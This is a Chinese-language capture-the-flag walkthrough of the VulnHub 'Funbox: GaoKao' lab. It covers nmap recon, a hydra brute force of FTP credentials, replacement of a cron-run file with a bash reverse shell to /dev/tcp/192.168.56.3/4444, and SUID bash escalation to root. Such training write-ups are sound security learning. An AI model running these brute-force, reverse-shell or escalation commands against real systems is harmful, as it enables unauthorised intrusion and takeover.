1、环境介绍

靶场介绍：https://www.vulnhub.com/entry/funbox-gaokao,707/
靶场下载：https://download.vulnhub.com/funbox/FunboxGaoKao.ova
靶场难度：简单
发布日期：2021年06月06日
文件大小：1.3 GB
靶场作者：0815R2d2
靶场系列：Funbox
靶场描述：

• 这是一个初学者的盒子，但并不容易。小心收集！！
• 提示：不要浪费时间！每个帐户尝试1500次后，所有端口的每一次BruteForce攻击都可以停止。
• 享受游戏和所见即所得！这在 VirtualBox 而不是 VMware 中更有效

打靶耗时：2+小时，非常的简单，而且不用做长时间爆破（我做的时候没看提示，所以依然做了一些爆破和目录扫描）
打靶关键：

1. 所见即所得，不用做 Web 目录扫描
2. FTP 密码爆破、FTP 基础操作
3. Linux 信息收集、SUID 提权

2、主机发现与端口扫描

攻击机 IP	192.168.56.3
靶机 IP	192.168.56.3

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l 
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.40   08:00:27:26:0a:e0       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.442 seconds (104.83 hosts/sec). 2 responded

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-23 00:51 EST
Nmap scan report for 192.168.56.40
Host is up (0.00060s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
|   256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_  256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after:  2031-06-03T15:15:30
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.34-0ubuntu0.18.04.1
|   Thread ID: 4
|   Capabilities flags: 65535
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, ODBCClient, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, SupportsCompression, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, FoundRows, SupportsLoadDataLocal, ConnectWithDatabase, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: 4r\x1B(C\P`BdFk\x12.b8J\x17*\x15
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:26:0A:E0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.56.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

3、21端口 - FTP

• 找到一个邮件模本文件「welcome.msg」
  • 获取到了一个用户名：sky
• 免登录用户，禁止上传文件

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.40
Connected to 192.168.56.40.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.40]
Name (192.168.56.40:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.56.3 !
230-
230-The local time is: Thu Nov 23 06:15:14 2023
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||39241|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
226 Transfer complete
ftp> lcd /root/soft/hack
Local directory now: /root/soft/hack
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||10481|)
150 Opening BINARY mode data connection for welcome.msg (169 bytes)
100% |*************************************************************************************|   169        1.66 MiB/s    00:00 ETA
226 Transfer complete
169 bytes received in 00:00 (100.20 KiB/s)
ftp> exit
221 Goodbye.

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||25285|)
550 php-reverse-shell.php: Operation not permitted

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat welcome.msg             
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server.  If you have any unusual problems,
please report them via e-mail to <sky@%L>.

4、80端口 - Web

4.1、目录扫描（所见即所得）

• 没扫到什么目录

# 基础小字典，初扫摸底
dirb http://192.168.56.40
# 较全面 conda activate py37
dirsearch -u http://192.168.56.40 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.40" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.40 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包，备份扫描
gobuster dir -u http://192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q

• http://192.168.56.40/index.html

5、3306端口 - MySQL

• 也没有什么好利用的

6、除了一个用户名，啥也没有了

6.1、尝试SSH爆破（同步 FTP 爆破）（失败）

• 爆破近3小时无果

hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 4 192.168.56.40 ssh

6.2、尝试FTP爆破

• 获取 FTP 用户密码：login: sky password: thebest
• 如果 FTP 依然爆破失败，就尝试 MySQL 爆破

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.40 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-23 06:51:56
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.56.40:21/
[STATUS] 695.00 tries/min, 695 tries in 00:01h, 14343738 to do in 343:59h, 30 active
[21][ftp] host: 192.168.56.40   login: sky   password: thebest
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 22 final worker threads did not complete until end.
[ERROR] 22 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-23 06:53:10

6.3、FTP 下载

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.40
Connected to 192.168.56.40.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.40]
Name (192.168.56.40:root): sky
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11605|)
150 Opening ASCII mode data connection for file list
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
226 Transfer complete
ftp> get user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||44739|)
150 Opening BINARY mode data connection for user.flag (66 bytes)
100% |*********************************************************************|    66      153.09 KiB/s    00:00 ETA
226 Transfer complete
66 bytes received in 00:00 (3.48 KiB/s)
ftp> exit
221 Goodbye.

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat user.flag      
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"

6.4、密文破解（失败）

• 尝试了各种方式，密文都破解不了，那就只是「flag」而没有隐藏信息

88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd

6.5、修改文件，尝试上传（反弹连接）

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat user.flag                                         
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.56.3/4444 0>&1'

• 上传前后，文件大小与日期发生了变更，应该是上传成功了

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.40                                    
Connected to 192.168.56.40.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.40]
Name (192.168.56.40:root): sky
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||34845|)
150 Opening ASCII mode data connection for file list
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
226 Transfer complete
ftp> put user.flag 
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||22920|)
150 Opening BINARY mode data connection for user.flag
100% |*********************************************************************|    65      729.61 KiB/s    00:00 ETA
226 Transfer complete
65 bytes sent in 00:00 (43.80 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||1266|)
150 Opening ASCII mode data connection for file list
-rwxr-x---   1 sky      sarah          65 Nov 22 13:58 user.flag
226 Transfer complete
ftp> exit
221 Goodbye.

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 4444           
listening on [any] 4444 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.40] 54186
bash: cannot set terminal process group (2686): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$

7、信息收集

7.1、基础信息收集

• 看到了上面利用的定时任务：bash -i /home/sky/user.flag > /dev/null
  • 谁会知道这个东西还有定时任务呀。。。

bash-4.4$ history
history
    1  history
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ sudo -l
sudo -l
[sudo] password for sarah: 

Sorry, try again.
[sudo] password for sarah: 

Sorry, try again.
[sudo] password for sarah: 

sudo: 3 incorrect password attempts
bash-4.4$ /usr/sbin/getcap -r / 2>/dev/null                                 
/usr/sbin/getcap -r / 2>/dev/null
bash-4.4$ crontab -l
crontab -l
*/1     *       *       *       *       bash -i /home/sky/user.flag > /dev/null
bash-4.4$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
bash-4.4$ hostnamectl
hostnamectl
   Static hostname: funbox9
         Icon name: computer-vm
           Chassis: vm
        Machine ID: ed2d094d18af4c1ba3eb96a785c4717d
           Boot ID: c993f09e5fe74e09849af2b3fe0674d6
    Virtualization: oracle
  Operating System: Ubuntu 18.04.5 LTS
            Kernel: Linux 4.15.0-144-generic
      Architecture: x86-64
bash-4.4$ echo $PATH
echo $PATH
/usr/bin:/bin
bash-4.4$ echo $BASH_VERSION
echo $BASH_VERSION
4.4.20(1)-release

7.2、文件信息收集

• 发现了具有S权限的/bin/bash
  • -rwsr-sr-x 1 root root 1113504 Jun 6 2019 /bin/bash

bash-4.4$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/bin/bash
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-sr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-sr-x 1 root mail 96648 Nov 16  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 113528 Feb  2  2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
lucy:x:1000:1000:lucy:/home/lucy:/bin/bash
sky:x:1001:1001:,,,:/home/sky:/bin/sh
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
postfix:x:114:115::/var/spool/postfix:/usr/sbin/nologin
alias:x:64010:117::/var/lib/qmail/alias:/bin/sh
qmaild:x:64011:117::/var/lib/qmail:/bin/sh
qmaill:x:64015:117::/var/lib/qmail:/bin/sh
qmailp:x:64016:117::/var/lib/qmail:/bin/sh
qmailq:x:64014:64010::/var/lib/qmail:/bin/sh
qmailr:x:64013:64010::/var/lib/qmail:/bin/sh
qmails:x:64012:64010::/var/lib/qmail:/bin/sh
sarah:x:1002:1002:,,,:/home/sarah:/bin/bash

8、SUID 提权

• 提权前后，命令行前缀没有什么变化

bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)

bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.flag
bash-4.4# cat root.flag
cat root.flag

  █████▒█    ██  ███▄    █  ▄▄▄▄    ▒█████  ▒██   ██▒     ▄████  ▄▄▄       ▒█████   ██ ▄█▀▄▄▄       ▒█████  
▓██   ▒ ██  ▓██▒ ██ ▀█   █ ▓█████▄ ▒██▒  ██▒▒▒ █ █ ▒░    ██▒ ▀█▒▒████▄    ▒██▒  ██▒ ██▄█▒▒████▄    ▒██▒  ██▒
▒████ ░▓██  ▒██░▓██  ▀█ ██▒▒██▒ ▄██▒██░  ██▒░░  █   ░   ▒██░▄▄▄░▒██  ▀█▄  ▒██░  ██▒▓███▄░▒██  ▀█▄  ▒██░  ██▒
░▓█▒  ░▓▓█  ░██░▓██▒  ▐▌██▒▒██░█▀  ▒██   ██░ ░ █ █ ▒    ░▓█  ██▓░██▄▄▄▄██ ▒██   ██░▓██ █▄░██▄▄▄▄██ ▒██   ██░
░▒█░   ▒▒█████▓ ▒██░   ▓██░░▓█  ▀█▓░ ████▓▒░▒██▒ ▒██▒   ░▒▓███▀▒ ▓█   ▓██▒░ ████▓▒░▒██▒ █▄▓█   ▓██▒░ ████▓▒░
 ▒ ░   ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░    ░▒   ▒  ▒▒   ▓▒█░░ ▒░▒░▒░ ▒ ▒▒ ▓▒▒▒   ▓▒█░░ ▒░▒░▒░ 
 ░     ░░▒░ ░ ░ ░ ░░   ░ ▒░▒░▒   ░   ░ ▒ ▒░ ░░   ░▒ ░     ░   ░   ▒   ▒▒ ░  ░ ▒ ▒░ ░ ░▒ ▒░ ▒   ▒▒ ░  ░ ▒ ▒░ 
 ░ ░    ░░░ ░ ░    ░   ░ ░  ░    ░ ░ ░ ░ ▒   ░    ░     ░ ░   ░   ░   ▒   ░ ░ ░ ▒  ░ ░░ ░  ░   ▒   ░ ░ ░ ▒  
          ░              ░  ░          ░ ░   ░    ░           ░       ░  ░    ░ ░  ░  ░        ���  ░    ░ ░  
                                 ░                                                                          

You did it ! 
THX for playing Funbox: GAOKAO !

I look forward to see this screenshot on twitter: @0815R2d2